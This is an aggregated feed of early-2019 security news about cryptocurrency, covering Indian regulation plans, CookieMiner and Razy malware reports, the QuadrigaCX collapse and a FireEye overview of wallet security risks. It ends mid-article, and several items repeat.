In any case, it most likely notes that 'vigilant monitoring' is required keeping in mind the rapid market developments and should the utilization of 'crypto-assets' keep on advancing, it could have some implications for financial stability later on.

The Reserve Bank of India (RBI) also emphasized in its Trend and Progress of Banking in India 2017-18 report that cryptocurrencies are not a risk right now, but rather they do require steady observing on the overall financial strength contemplations, given the fast extension in their utilization.



E Hacking News - Latest Hacker News and IT Security News

The Indian Government Reportedly Worried Of Cryptocurrencies Destabilizing the Rupee



The Indian government panel entrusted with drafting the crypto regulation is supposedly "fixated" with the effect they might have on the rupee in the event if they are permitted to be utilized in payments. The panel was set up in November 2017 headed by the top bureaucrat Subhash Chandra Garg, Secretary of the Department of Economic Affairs. The board is as of now said to be in the propelled phases of drafting the regulations for cyrptocurrency utilization in India.

One of the representatives from the crypto currency background who as of late met the ministers, asking for obscurity says that

“If bitcoin and other digital currencies are going to be allowed to be used for payments then whether it will end up destabilising the fiat currency is a major concern for them (the Garg panel), the overall impact on the financial ecosystem that it is likely to have is still unclear and it has been a challenge to convince them on this particular point.”

While Garg's panel  is settling its report containing the proposals for the country's crypto regulation , the Ministry of Finance told the Parliament that  “It is difficult to state a specific timeline to come up with clear recommendations”  furthermore that Garg’s panel is “pursuing the matter with due caution.”

The Financial Stability Board (FSB) has effectively distributed a report in October a year ago on the financial stability implications of crypto assets, which expresses that “crypto assets do not pose a material risk to global financial stability at this time.”

In any case, it most likely notes that 'vigilant monitoring' is required keeping in mind the rapid market developments and should the utilization of 'crypto-assets' keep on advancing, it could have some implications for financial stability later on.

The Reserve Bank of India (RBI) also emphasized in its Trend and Progress of Banking in India 2017-18 report that cryptocurrencies are not a risk right now, but rather they do require steady observing on the overall financial strength contemplations, given the fast extension in their utilization.

CookieMiner Malware Can Steal Crypto Exchange Cookies, Saved Passwords and iPhone SMS Messages

Researchers have discovered a new malware used to steal saved passwords and credit card details from browsers. In addition, it

CookieMiner Malware Can Steal Crypto Exchange Cookies, Saved Passwords and iPhone SMS Messages on Latest Hacking News.

Critical Zcash Bug Could Have Allowed ‘Infinite Counterfeit’ Cryptocurrency

The developers behind the privacy-minded Zcash cryptocurrency have recently discovered and patched a highly dangerous vulnerability in the most secretive way that could have allowed an attacker to coin an infinite number of Zcash (ZEC). Yes, infinite… like a never-ending source of money. Launched in October 2016, Zcash is a privacy-oriented cryptocurrency that claims to be more anonymous

Upcoming Firefox version to offer fingerprinting & cryptomining protection

By Uzair Amir

There is very good news for Mozilla Firefox users. After improving the user experience with tracking protection function offering content blocking features and other changes in Firefox 63, Mozilla is aiming for another significant update in the upcoming version of the browser. The new version of Mozilla Firefox called Firefox 67, which is planned to […]

This is a post from HackRead.com Read the original post: Upcoming Firefox version to offer fingerprinting & cryptomining protection

Cybercriminals Generated $56 Million Over 12 Years From Monero Crypto-Mining Malware

An analysis of more than 4.4 million malware samples showed botnets were responsible for crypto-mining at least 4.3 percent of Monero over a 12-year period.

These illicit efforts generated an estimated $56 million for cybercriminals behind the campaigns. The study from academics in the U.K. and Spain used a combination of both dynamic and static analysis techniques to pull details from the malware campaigns, including an exploration of the mining pools where payments were made as well as cryptocurrency addresses. Over the 12 years, Monero (XMR) was the most popular cryptocurrency targeted by botnets, the study concluded.

New Crypto-Mining Threat Groups Discovered

While the research paper mentioned previously known malware campaigns such as Smominru and Adylkuzz, the study’s authors also noted some new threat actors. These included Freebuf and USA-138, which used general-purpose botnets rather than renting third-party infrastructure to carry out their mining operations.

Though the latter technique tended to be more successful based on the analyses in the study, the findings are a reminder that cybercriminals are highly capable of using legitimate file management tools and code repositories for illicit purposes.

Since mining pools are known to ban suspicious XMR addresses from time to time, and because mining protocols are subject to change, the researchers concluded that some malware authors often modified their code. Some of these campaigns are still active, while others were relatively brief, according to the paper.

In terms of methodology, the researchers said xmrig, an open-source tool, was most commonly used to build the malware strains that powered crypto-mining bots.

Catching Crypto-Mining Before It Happens

Beyond the money it generates for threat actors, crypto-mining, also known as crypto-jacking, has the secondary adverse impact of draining an organization’s central processing unit (CPU) resources.

IBM X-Force research published last year confirmed that crypto-mining has grown significantly over the past few years and needs to become an active part of IT security monitoring. As it becomes a more persistent threat, utilizing security information and event management (SIEM) tools combined with strong endpoint protection is one of the best ways to ensure your technology infrastructure doesn’t become a place for criminals to harvest Monero.

The post Cybercriminals Generated $56 Million Over 12 Years From Monero Crypto-Mining Malware appeared first on Security Intelligence.

Crypto exchange loses access to $145M after CEO dies without giving password

By Waqas

The Canada-based cryptocurrency exchange QuardigaCX has suffered a major setback after the untimely death of its founder and CEO Gerald Cotten. Apparently, Cotten had exclusive and crucial information about the exchange’s password. Now that the CEO is no more, the exchange claims to have lost access to an exorbitant virtual currency amount that totals around […]

This is a post from HackRead.com Read the original post: Crypto exchange loses access to $145M after CEO dies without giving password

Security Affairs: QuadrigaCX exchange lost access to $145 Million funds after founder dies

QuadrigaCX Bitcoin exchange announced to have lost USD 145 million worth of cryptocurrency because the only person with access to its cold storage has died.


QuadrigaCX, the major Bitcoin exchange in Canada announced to have lost CAD 190 million (USD 145 million) worth of cryptocurrency because the only person with access to its cold (offline) storage wallets has died.

This person was Gerry Cotten, the founder and chief executive officer at QuadrigaCX. The Canadian exchange filed for legal protection from creditors in the Nova Scotia Supreme Court until it locates lost funds.

The bankruptcy hearing for QuadrigaCX is scheduled for February 5 at the same court Nova Scotia Supreme Court.

“In a sworn affidavit filed Jan. 31 with the Nova Scotia Supreme Court, Jennifer Robertson, identified as the widow of QuadrigaCX founder Gerald Cotten, said the exchange owes its customers roughly $250 million CAD ($190 million) in both cryptocurrency and fiat.” reported Coindesk.

“The company previously announced it had filed for creditor protection on its website, but the filing itself provides greater details about its predicament.

As of Jan. 31, 2019, there were roughly 115,000 users with balances signed up on the exchange, with $70 million CAD in fiat and $180 million CAD in crypto owed overall, according to the filing.

The exchange holds roughly 26,500 bitcoin ($92.3 million USD), 11,000 bitcoin cash ($1.3 million), 11,000 bitcoin cash SV ($707,000), 35,000 bitcoin gold ($352,000), nearly 200,000 litecoin ($6.5 million) and about 430,000 ether ($46 million), totaling $147 million, according to the affidavit.”

quadrigacx cryptocurrency-exchange

According to a sworn affidavit filed by Cotten’s widow Jennifer Robertson, QuadrigaCX was maintaining some CAD 260 million (USD 198 Million) in both cryptocurrencies (Bitcoin, Bitcoin Cash, Litecoin, and Ethereum) and fiat money.

The majority of the funds was stored in a cold wallet, just USD 286,000 were stored in the hot wallet of the company. A ‘cold wallet’ is used by exchanges to protect the funds from online threats, for this reason, it is a physical device that is isolated from the Internet.

The cold wallet was protected with a private key that was known only by Cotten, who unfortunately died of Crohn’s disease on December 9 in Jaipur, India.

Cotten’s wife declared that no other members of the company was in possession of the key to access the funds.

“For the past weeks, we have worked extensively to address our liquidity issues, which include attempting to locate and secure our very significant cryptocurrency reserves held in cold wallets, and that are required to satisfy customer cryptocurrency balances on deposit, as well as sourcing a financial institution to accept the bank drafts that are to be transferred to us. Unfortunately, these efforts have not been successful,” reads a message posted on the QuadrigaCX website.

Some experts don’t believe in the version provided by the QuadrigaCX team, they speculated that QuadrigaCX never dad $100 Million in is pool of funds. If confirmed, the company never had a cold wallet storing such amount of funds.

Is this an exit scam?

The researcher CryptoMed investigated the case by analyzing the blockchain of the QuadrigaCX’s Bitcoin Holdings. The experts examined TX IDs, addresses, and coin movements, and concluded that “there is no identifiable cold wallet reserves for QuadrigaCX.”

“The number of bitcoins in QuadrigaCX’s possession is substantially less than what was reported in Jennifer Robertson’s affidavit, submitted to the Canadian courts on January 31st, 2019,” reads the post published by the researcher on Medium.

“At least some of the delays in delivering crypto withdrawals to customers were due to the fact that QuadrigaCX simply did not have the funds on hand at the time. In some cases, QuadrigaCX was forced to wait for enough customer deposits to be made on the exchange before processing crypto withdrawal requests by their customers.”

“The people trying to pull off a QuadrigaCX exit scam could actually be the family and other employees, by hiding the fact that the cold wallet keys are known,” speculates bitcoin analyst Peter Todd. “Not saying this is happening, but need to consider all possibilities fairly in the investigation.”

The only certainty is that thousands of users would never be able to access their funds.

Pierluigi Paganini

(SecurityAffairs – QuadrigaCX’s , exit scam)

The post QuadrigaCX exchange lost access to $145 Million funds after founder dies appeared first on Security Affairs.



Security Affairs

QuadrigaCX exchange lost access to $145 Million funds after founder dies

QuadrigaCX Bitcoin exchange announced to have lost USD 145 million worth of cryptocurrency because the only person with access to its cold storage has died.


QuadrigaCX, the major Bitcoin exchange in Canada announced to have lost CAD 190 million (USD 145 million) worth of cryptocurrency because the only person with access to its cold (offline) storage wallets has died.

This person was Gerry Cotten, the founder and chief executive officer at QuadrigaCX. The Canadian exchange filed for legal protection from creditors in the Nova Scotia Supreme Court until it locates lost funds.

The bankruptcy hearing for QuadrigaCX is scheduled for February 5 at the same court Nova Scotia Supreme Court.

“In a sworn affidavit filed Jan. 31 with the Nova Scotia Supreme Court, Jennifer Robertson, identified as the widow of QuadrigaCX founder Gerald Cotten, said the exchange owes its customers roughly $250 million CAD ($190 million) in both cryptocurrency and fiat.” reported Coindesk.

“The company previously announced it had filed for creditor protection on its website, but the filing itself provides greater details about its predicament.

As of Jan. 31, 2019, there were roughly 115,000 users with balances signed up on the exchange, with $70 million CAD in fiat and $180 million CAD in crypto owed overall, according to the filing.

The exchange holds roughly 26,500 bitcoin ($92.3 million USD), 11,000 bitcoin cash ($1.3 million), 11,000 bitcoin cash SV ($707,000), 35,000 bitcoin gold ($352,000), nearly 200,000 litecoin ($6.5 million) and about 430,000 ether ($46 million), totaling $147 million, according to the affidavit.”

quadrigacx cryptocurrency-exchange

According to a sworn affidavit filed by Cotten’s widow Jennifer Robertson, QuadrigaCX was maintaining some CAD 260 million (USD 198 Million) in both cryptocurrencies (Bitcoin, Bitcoin Cash, Litecoin, and Ethereum) and fiat money.

The majority of the funds was stored in a cold wallet, just USD 286,000 were stored in the hot wallet of the company. A ‘cold wallet’ is used by exchanges to protect the funds from online threats, for this reason, it is a physical device that is isolated from the Internet.

The cold wallet was protected with a private key that was known only by Cotten, who unfortunately died of Crohn’s disease on December 9 in Jaipur, India.

Cotten’s wife declared that no other members of the company was in possession of the key to access the funds.

“For the past weeks, we have worked extensively to address our liquidity issues, which include attempting to locate and secure our very significant cryptocurrency reserves held in cold wallets, and that are required to satisfy customer cryptocurrency balances on deposit, as well as sourcing a financial institution to accept the bank drafts that are to be transferred to us. Unfortunately, these efforts have not been successful,” reads a message posted on the QuadrigaCX website.

Some experts don’t believe in the version provided by the QuadrigaCX team, they speculated that QuadrigaCX never dad $100 Million in is pool of funds. If confirmed, the company never had a cold wallet storing such amount of funds.

Is this an exit scam?

The researcher CryptoMed investigated the case by analyzing the blockchain of the QuadrigaCX’s Bitcoin Holdings. The experts examined TX IDs, addresses, and coin movements, and concluded that “there is no identifiable cold wallet reserves for QuadrigaCX.”

“The number of bitcoins in QuadrigaCX’s possession is substantially less than what was reported in Jennifer Robertson’s affidavit, submitted to the Canadian courts on January 31st, 2019,” reads the post published by the researcher on Medium.

“At least some of the delays in delivering crypto withdrawals to customers were due to the fact that QuadrigaCX simply did not have the funds on hand at the time. In some cases, QuadrigaCX was forced to wait for enough customer deposits to be made on the exchange before processing crypto withdrawal requests by their customers.”

“The people trying to pull off a QuadrigaCX exit scam could actually be the family and other employees, by hiding the fact that the cold wallet keys are known,” speculates bitcoin analyst Peter Todd. “Not saying this is happening, but need to consider all possibilities fairly in the investigation.”

The only certainty is that thousands of users would never be able to access their funds.

Pierluigi Paganini

(SecurityAffairs – QuadrigaCX’s , exit scam)

The post QuadrigaCX exchange lost access to $145 Million funds after founder dies appeared first on Security Affairs.

Cryptocurrency Firm Loses $145 Million After CEO Dies With Only Password

QuadrigaCX, the largest bitcoin exchange in Canada, has claimed to have lost CAD 190 million (nearly USD 145 million) worth of cryptocurrency after the exchange lost access to its cold (offline) storage wallets. Reason? Unfortunately, the only person with access to the company’s offline wallet, founder of the cryptocurrency exchange, is dead. Following the sudden death of Gerry Cotten,

First Hacker Convicted of ‘SIM Swapping’ Attack Gets 10 Years in Prison

A 20-year-old college student who stole cryptocurrency worth more than $5 million by hijacking victims' phone numbers has pleaded guilty and accepted a sentence of 10 years in prison. Ortiz was arrested last year on charges of siphoning millions of dollars in cryptocurrency from around 40 victims using a method commonly known as "SIM swapping," which typically involves fraudulently porting of

$137milllion Worth of QuadrigaCX’s Customers’ Bitcoin Stuck in The Abyss

Cryptocurrency exchange, QuadrigaCX, has suffered a security incident after it lost control of its customers assets. $137 million worth of

$137milllion Worth of QuadrigaCX’s Customers’ Bitcoin Stuck in The Abyss on Latest Hacking News.

Why Investors Should Be Paying Attention to Quant Network (QNT)

One of the bigger winners of the last week was Quant Network. This is largely attributed to the January 30th announcement they would be listed on Bittrex. This is essentially the first “real” exchange they have been listed on, so they naturally experienced a large spike (26.65% over the course of the last 7 days). […]

The post Why Investors Should Be Paying Attention to Quant Network (QNT) appeared first on Hacked: Hacking Finance.

New Mac Malware Targets Cookies to Steal From Cryptocurrency Wallets

Mac users need to beware of a newly discovered piece of malware that steals their web browser cookies and credentials in an attempt to withdraw funds from their cryptocurrency exchange accounts. Dubbed CookieMiner due to its capability of stealing cookies-related to cryptocurrency exchanges, the malware has specifically been designed to target Mac users and is believed to be based on

New Mac Malware Steals Cookies, Cryptocurrency & Computing Power

Dubbed CookieMiner on account of its cookie-stealing capabilities, this newly discovered malware is believed to be based on DarthMiner, another recently detected Mac malware that combines the EmPyre backdoor and

The post New Mac Malware Steals Cookies, Cryptocurrency & Computing Power appeared first on The Cyber Security Place.

MGO Token Is Now the Preferred Currency for Game Publishers

The last few years in the crypto markets have been like riding a roller coaster.  There was period of pure euphoria, mainly during 2017.  And, now, we are stuck, perpetually it seems, in a period of doom and gloom.  It’s unclear when things will turn around.  Because of the bear market that appears to have […]

The post MGO Token Is Now the Preferred Currency for Game Publishers appeared first on Hacked: Hacking Finance.

New Mac Malware steals iPhone text messages from iTunes backups

By Waqas

The IT security researchers at Palo Alto Networks’ Unit 42 have discovered a dangerous new Mac malware capable of targeting devices for multi-purposes including stealing cryptocurrency. Dubbed CookieMiner by researchers; the Mac malware is a variant of OSX.DarthMiner, another nasty piece of malware known for targeting MacOS. But, CookieMiner aims at much more than its predecessor. See: 400% increase in […]

This is a post from HackRead.com Read the original post: New Mac Malware steals iPhone text messages from iTunes backups

Security Affairs: CookieMiner Mac Malware steals browser cookies and sensitive Data

Palo Alto Networks discovered a piece of Mac malware dubbed CookieMiner that is targeting browser cookies associated with cryptocurrency exchanges and wallet service websites..

Researchers from Palo Alto Networks discovered a new piece of Mac malware dubbed CookieMiner that steals browser cookies associated with cryptocurrency exchanges and wallet service websites along with other sensitive data.

The malware targets cookies associated with cryptocurrency exchanges such as Binance, Coinbase, Poloniex, Bittrex, Bitstamp, and MyEtherWallet. It would steal cookies aby website that has “blockchain” in their domain name.
CookieMiner leverages a Python script named “harmlesslittlecode.py.” to steal saved login credentials and credit card information from Chrome.

CookieMiner

CookieMiner is based in the OSX.DarthMiner malware that was discovered by experts at Malwarebytes in December, it is able to steal browser cookies from Chrome and Safari browsers and also sensitive data such as user credentials, in Chrome, saved credit card credentials in Chrome, iPhone text messages from backups and cryptocurrency wallet data and keys.

“This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims.” reads the analysis published by PaloAlto Networks.

“It also steals saved passwords in Chrome. By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites. “

Crooks aim to empty the victim’s exchange account or wallet by using a combination of stolen login credentials, web cookies, and SMS data.

Experts believe the threat actors could bypass multifactor authentication for the sites for which they are able to steal associated info.

CookieMiner configures the compromised systems to load coinmining software that appears like an XMRIG-type miner, but that mines Koto, a lesser popular cryptocurrency associated with Japan.

Like DarthMiner, the malware leverages on the EmPyre backdoor as a post-exploitation agent, it checks if the Little Snitch firewall is running on the target host and aborts installation if it does.

“The malware ‘CookieMiner’ is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated.” Palo Alto Networks concludes.

“Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage,”

Further details, including IoCs, are reported in the analysis published by PaloAlto networks.

Pierluigi Paganini

(SecurityAffairs – CookieMiner, cryptocurrency malware)

The post CookieMiner Mac Malware steals browser cookies and sensitive Data appeared first on Security Affairs.



Security Affairs

CookieMiner Mac Malware steals browser cookies and sensitive Data

Palo Alto Networks discovered a piece of Mac malware dubbed CookieMiner that is targeting browser cookies associated with cryptocurrency exchanges and wallet service websites..

Researchers from Palo Alto Networks discovered a new piece of Mac malware dubbed CookieMiner that steals browser cookies associated with cryptocurrency exchanges and wallet service websites along with other sensitive data.

The malware targets cookies associated with cryptocurrency exchanges such as Binance, Coinbase, Poloniex, Bittrex, Bitstamp, and MyEtherWallet. It would steal cookies aby website that has “blockchain” in their domain name.
CookieMiner leverages a Python script named “harmlesslittlecode.py.” to steal saved login credentials and credit card information from Chrome.

CookieMiner

CookieMiner is based in the OSX.DarthMiner malware that was discovered by experts at Malwarebytes in December, it is able to steal browser cookies from Chrome and Safari browsers and also sensitive data such as user credentials, in Chrome, saved credit card credentials in Chrome, iPhone text messages from backups and cryptocurrency wallet data and keys.

“This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims.” reads the analysis published by PaloAlto Networks.

“It also steals saved passwords in Chrome. By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites. “

Crooks aim to empty the victim’s exchange account or wallet by using a combination of stolen login credentials, web cookies, and SMS data.

Experts believe the threat actors could bypass multifactor authentication for the sites for which they are able to steal associated info.

CookieMiner configures the compromised systems to load coinmining software that appears like an XMRIG-type miner, but that mines Koto, a lesser popular cryptocurrency associated with Japan.

Like DarthMiner, the malware leverages on the EmPyre backdoor as a post-exploitation agent, it checks if the Little Snitch firewall is running on the target host and aborts installation if it does.

“The malware ‘CookieMiner’ is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated.” Palo Alto Networks concludes.

“Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage,”

Further details, including IoCs, are reported in the analysis published by PaloAlto networks.

Pierluigi Paganini

(SecurityAffairs – CookieMiner, cryptocurrency malware)

The post CookieMiner Mac Malware steals browser cookies and sensitive Data appeared first on Security Affairs.

Thieves stole $1.7 billion in cryptocurrency in 2018 as mining gives way to stealing in crypto space

Bitcoin’s legendary ascension to the $20,000 mark a little more than a year ago inspired legions of fast-buck makers to hop on the bandwagon and invest in this intriguing yet volatile asset.

Mining cryptocurrency worked for a while, but it is no longer feasible because of the increasing complexity behind the algorithms, especially in the case of Bitcoin. So players in the cryptocurrency market are now (loosely) divided into two categories: those who trade it and those who steal it.

And the line between the ICOs and exchanges in the former group and the thieves, scammers and hackers of the second group is blurring by the day. Some exchanges and initial coin offerings are now entirely set up to perform an exit scam.

Playing with digital currency today is like playing with fire, as the risks now outweigh the benefits. New research reveals that thieves and scammers stole $1.7 billion in cryptocurrency in 2018. Theft from cryptocurrency exchanges accounted for most of the criminal activity: more than $950 million was stolen by hackers in 2018 – 3.6 times more than in 2017. Investors and exchange users lost at least $725 million in cryptocurrency in 2018 to exit scams, phony exchange hacks, and Ponzi schemes, according to CipherTrace.

Criminals now need to launder all these funds to cash out before a wave of crypto-centric regulations go into effect this year.


3.6x More Cryptocurrency Stolen in 2018 Versus 2017 According to CipherTrace (Graphic: Business Wire)

CipherTrace has also identified the top 10 trending crypto threats (below) in an effort to provide “actionable threat intelligence for anyone dealing with cryptocurrency.” From the report:

  • SIM swapping: An identity theft technique that takes over a victim’s mobile device to steal credentials and break into wallets or exchange accounts to steal cryptocurrency.
  • Crypto dusting: A new form of blockchain spam that erodes the recipient’s reputation by sending cryptocurrency from known money mixers.
  • Sanction evasion: Nation states that use cryptocurrencies promoted by the Iranian and Venezuelan governments to circumvent sanctions.
  • Next-generation crypto mixers: Money laundering services that promise to exchange tainted tokens for freshly mined crypto, but in reality cleanse cryptocurrency through exchanges.
  • Shadow money service businesses (MSBs): Unlicensed MSBs that bank cryptocurrency without the knowledge of host financial institutions, exposing banks to unknown risk.
  • Datacenter-scale cryptojacking: Takeover attacks that mine for cryptocurrency at a massive scale and that have been discovered in datacenters, including AWS.
  • Lightning Network transactions: Enabling anonymous bitcoin transactions by going “off-chain” and now scaling to $2,150,000.
  • Decentralized stable coins: Stabilized tokens that can be designed for use as hard-to-trace private coins.
  • Email extortion and bomb threats: Mass-customized phishing email campaigns by cyber-extortionists using old passwords and spouse names to demand bitcoin. Bomb threat extortion scams spiked in December.
  • Crypto-robbing ransomware: New malware distributed by cyber-extortionists that empties cryptocurrency wallets and steals private keys while holding user data hostage.

In the wake of numerous such incidents, countries around the world are accelerating the adoption of anti-money-laundering regulations and cryptocurrency forensics. However, as in the classical monetary system, some countries are lagging behind in regulating cryptocurrency, serving as potential havens for money laundering, fraud, and tax evasion.

ENISA’s Latest Threat Landscape Report Reveals Top Cyber Threats and Trends in Europe

The European Union Agency for Network and Information Security (ENISA) reveals in its latest report that malware and web-based attacks

ENISA’s Latest Threat Landscape Report Reveals Top Cyber Threats and Trends in Europe on Latest Hacking News.

Razy Trojan Installs Malicious Browser Extensions to Steal Cryptocurrency

Security researchers observed the Razy Trojan installing malicious extensions across multiple web browsers to steal cryptocurrency.

In 2018, Kaspersky Lab noticed that the Trojan was being distributed via advertising blocks on websites and free file hosting services disguised as legitimate software. The malware uses different infection processes for Google Chrome, Mozilla Firefox and Yandex Browser, disabling automatic updates and integrity checks for installed extensions.

Razy then uses its main.js script to steal cryptocurrency by searching websites for the addresses of digital wallets. If it finds what it’s looking for, the Trojan replaces the wallet addresses with those controlled by the malware’s operators.

Razy can also spoof images of QR codes that point to cryptocurrency wallets, modify digital currency exchanges’ webpages by displaying messages that lure users with the promise of new features, and alter Google or Yandex search results to trick victims into visiting infected websites.

Not the First Cryptocurrency Stealer — And Likely Not the Last

The Razy Trojan isn’t the first malware known for stealing users’ cryptocurrency. In July 2018, for example, Fortinet came across a malware sample that modified victims’ clipboard content to replace a copied bitcoin address with one belonging to threat actors. Just a few months later, researchers at enSilo discovered DarkGate, malware that is capable of crypto-mining and ransomware-like behavior in addition to stealing virtual currency from victims’ wallets.

These malware samples played a part in the rise of cryptocurrency theft last year. In just the first six months of 2018, Carbon Black observed that digital currency theft reached $1.1 billion. One of the incidents that took place within that time period involved the theft of $530 million, as reported by CNN.

How to Defend Against Malware Like Razy

Security professionals can help defend against threats like Razy by incorporating artificial intelligence (AI) into their organizations’ malware defense strategies, including the use of AI in detectors and cyber deception to misdirect and deactivate AI-powered attacks. Experts also recommend using blockchain and other advanced technologies to protect against cryptocurrency threats.

The post Razy Trojan Installs Malicious Browser Extensions to Steal Cryptocurrency appeared first on Security Intelligence.

Anatova Ransomware Deemed the Next Big Threat to Users

The ransomware, Anatova only surfaced earlier this year but is already recognised as the next biggest threat to users.  Although

Anatova Ransomware Deemed the Next Big Threat to Users on Latest Hacking News.

Cryptocurrency and Blockchain Networks: Facing New Security Paradigms

On Jan. 22, FireEye participated in a panel focused on cryptocurrencies and blockchain technology during the World Economic Forum. The panel addressed issues raised in a report developed by FireEye, together with our partner Marsh & McLennan (a global professional services firm) and Circle (a global crypto finance company). The report touched on some of the security considerations around crypto-assets – today and in the future, and in this blog post, we delve deeper into the security paradigms surrounding cryptocurrencies and blockchain networks.

First, some background that will provide context for this discussion.

Cryptocurrencies – A Primer

By its simplest definition, cryptocurrency is digital money that operates on its own decentralized transaction network. When defined holistically, many argue that cryptocurrencies and their distributed ledger (blockchain) technology is powerful enough to radically change the basic economic pillars of society and fundamentally alter the way our systems of trust, governance, trade, ownership, and business function. However, the technology is new, subject to change, and certain headwinds related to scalability and security still need to be navigated. It is safe to assume that the ecosystem we have today will evolve. Since the final ecosystem is yet to be determined, as new technology develops and grows in user adoption, the associated risk areas will continually shift – creating new cyber security paradigms for all network users to consider, whether you are an individual user of cryptocurrency, a miner, a service-provider (e.g., exchange, trading platform, or key custodian), a regulator, or a nation-state with vested political interest.

Malicious actors employ a wide variety of tactics to steal cryptocurrencies. These efforts can target users and their wallets, exchanges and/or key custodial services, and underlying networks or protocols supporting cryptocurrencies. FireEye has observed successful attacks that steal from users and cryptocurrency exchanges over the past several years. And while less frequent, attacks targeting cryptocurrency networks and protocols have also been observed. We believe cryptocurrency exchanges and/or key custodial services are, and will continue to be, attractive targets for malicious operations due to the potentially large profits, their often-lax physical and network security, and the lack of regulation and oversight.

This blog post will highlight some of the various risk areas to consider when developing and adopting cryptocurrency and blockchain technology.

Wallet & Key Management

Public and Private Keys

There are two types of keys associated with each wallet: a public key and a private key. Each of these keys provides a different function, and it is the security of the private key that is paramount to securing cryptocurrency funds.

The private key is a randomly generated number used to sign transactions and spend funds within a specific wallet, and the public key (which is derived from the private key) is used to generate a wallet address to which they can receive funds.


Figure 1: Private key, public key, and address generation flow

The private key must be kept secret at all times and, unfortunately, revealing it to third-parties (or allowing third-parties to manage and store private keys) increases convenience at the expense of security. In fact, some of the most high-profile exchange breaches have occurred in large part due to a lack of operational controls relating to the storage of private keys. Maintaining the confidentiality, integrity, and availability of private keys requires fairly robust controls.

However, from an individual user perspective, a large number of user-controlled software wallet solutions store the private and public keys in a wallet file on the user’s hard drive that is located in a well-known directory, making it an ideal target for actors that aim to steal private keys. Easily available tools such as commercial keyloggers and remote access tools (RATs) can be used to steal funds by stealing (or making copies of) a user’s wallet file. FireEye has observed myriad malware families, traditionally aimed at stealing banking credentials, incorporate the ability to target cryptocurrency wallets and online services. FireEye Intelligence subscribers may be familiar with this already, as we’ve published about these malware families use in targeting cryptocurrency assets on our FireEye Intelligence Portal. The following are some of the more prominent crimeware families we have observed include such functionality:

  • Atmos
  • Dridex
  • Gozi/Ursnif
  • Ramnit
  • Terdot
  • Trickbot
  • ZeusPanda/PandaBot
  • IcedID
  • SmokeLoader
  • Neptune EK
  • BlackRuby Ransomware
  • Andromeda/Gamarue
  • ImminentMonitor RAT
  • jRAT
  • Neutrino
  • Corebot

Wallet Solutions

By definition, cryptocurrency wallets are used to store a user’s keys, which can be used to unlock access to the funds residing in the associated blockchain entry (address). Several types of wallets exist, each with their own level of security (pros) and associated risks (cons). Generally, wallets fall into two categories: hot (online) and cold (offline).

Hot Wallets

A wallet stored on a general computing device connected to the internet is often referred to as a “hot” wallet. This type of storage presents the largest attack surface and is, consequently, the riskiest way to store private keys. Types of hot wallets typically include user-controlled and locally stored wallets (also referred to as desktop wallets), mobile wallets, and web wallets. If remote access on any hot wallet device occurs, the risk of theft greatly increases. As stated, many of these solutions store private keys in a well-known and/or unencrypted location, which can make for an attractive target for bad actors. While many of these wallet types offer the user high levels of convenience, security is often the trade-off.

Wallet Type

Examples

Desktop

  • Bitcoin Core
  • Atomic
  • Exodus
  • Electrum
  • Jaxx

Mobile

  • BRD
  • Infinito
  • Jaxx
  • Airbitz
  • Copay
  • Freewallet

Web

  • MyEtherWallet
  • MetaMask
  • Coinbase
  • BTC Wallet
  • Blockchain.info

Table 1: Types of hot wallets

If considering the use of hot wallet solutions, FireEye recommends some of the following ways to help mitigate risk:

  • Use two-factor authentication when available (as well as fingerprint authentication where applicable).
  • Use strong passwords.
  • Ensure that your private keys are stored encrypted (if possible).
  • Consider using an alternative or secondary device to access funds (like a secondary mobile device or computer not generally used every day) and kept offline when not in use.
Cold Wallets

Offline, also called cold wallets, are those that generate and store private keys offline on an air-gapped computer without network interfaces or connections to the outside internet. Cold wallets work by taking the unsigned transactions that occur online, transferring those transactions offline to be verified and signed, and then pushing the transactions back online to be broadcasted onto the Bitcoin network. Managing private keys in this way is considered to be more secure against threats such as hackers and malware. These types of offline vaults used for storing private keys is becoming the industry security standard for key custodians such as Coinbase, Bittrex, and other centralized cryptocurrency companies. Even recently, Fidelity Investments released a statement regarding their intentions to play an integral part of the Bitcoin’s custodial infrastructure landscape.

"Fidelity Digital Assets will provide a secure, compliant, and institutional-grade omnibus storage solution for bitcoin, ether and other digital assets. This consists of vaulted cold storage, multi-level physical and cyber controls – security protocols that have been created leveraging Fidelity’s time-tested security principles and best practices combined with internal and external digital asset experts."

-Fidelity Investments                                

While more security-conscious exchanges employ this type of key storage for their users, cold wallets are still susceptible to exploitation:

  • In November 2017, ZDnet published an article describing four methods hackers use to steal data from air-gapped computers through what they call “covert channels.” These channels can be broken down into four groups:
    • Electromagnetic
    • Acoustic
    • Thermal
    • Optical
  • In addition to those four types of attacks, WikiLeaks revealed, as part of its ongoing Vault 7 leak, a tool suite (dubbed Brutal Kangaroo, formerly EZCheese) allegedly used by the CIA for targeting air-gapped networks.
  • In February 2018, security researchers with the Cybersecurity Research Center at Israel's Ben-Gurion University made use of a proof-of-concept (PoC) malware that allowed for the exfiltration of data from computers placed inside a Faraday cage (an enclosure used to block electromagnetic fields). According to their research, attackers can exfiltrate data from any infected computer, regardless if air-gapped or inside a Faraday cage. The same group of researchers also revealed additional ways to exploit air-gapped computers:
    • aIR-Jumper attack that steals sensitive information from air-gapped computers with the help of infrared-equipped CCTV cameras that are used for night vision
    • USBee attack that can be used steal data from air-gapped computers using radio frequency transmissions from USB connectors
    • DiskFiltration attack that can steal data using sound signals emitted from the hard disk drive (HDD) of the targeted air-gapped computer
    • BitWhisper that relies on heat exchange between two computer systems to stealthily siphon passwords or security keys
    • AirHopper that turns a computer's video card into an FM transmitter to capture keystrokes
    • Fansmitter technique that uses noise emitted by a computer fan to transmit data
    • GSMem attack that relies on cellular frequencies
    • PowerHammer, a malware that leverages power lines to exfiltrate data from air-gapped computers.
Hardware Wallets

